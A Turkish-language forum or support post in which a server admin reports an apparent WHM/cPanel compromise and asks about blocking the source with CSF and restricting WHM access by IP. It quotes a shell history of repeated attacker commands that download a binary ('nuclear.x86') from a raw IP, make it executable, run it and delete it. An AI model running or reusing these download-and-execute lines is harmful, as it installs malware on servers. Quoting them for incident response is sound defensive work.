Wget saat 1'de çalıştırılmış görünüyor.
Yani tam 1 saat önce. Bu noktada sabah 6 ya dönüp whm güncellemesi yapman mantıklı bir seçenek olur.
İlgili adresi csf üzerinden engellemek geçici bir çözüm olur mu? Çünkü çalıştığım Adminler şuan müsait değiller onlar da bu sorunla farklı şirketlerde uğraşıyorlar anladığım kadarıyla veya bana direk ip adresim haricinde whm erişimini nasıl kısıtlayabileceğimin bilgisini verebilir misiniz?
İlk bağlantı 9 da olmuş sanırım:
894 2026-04-30 09:50:07 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777531807081275437__
895 2026-04-30 09:54:22 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777532062616074040__
896 2026-04-30 10:18:03 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777533483195992255__
897 2026-04-30 10:35:43 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777534543402046613__
898 2026-04-30 10:37:28 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777534648937097199__
899 2026-04-30 10:49:13 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777535354279018375__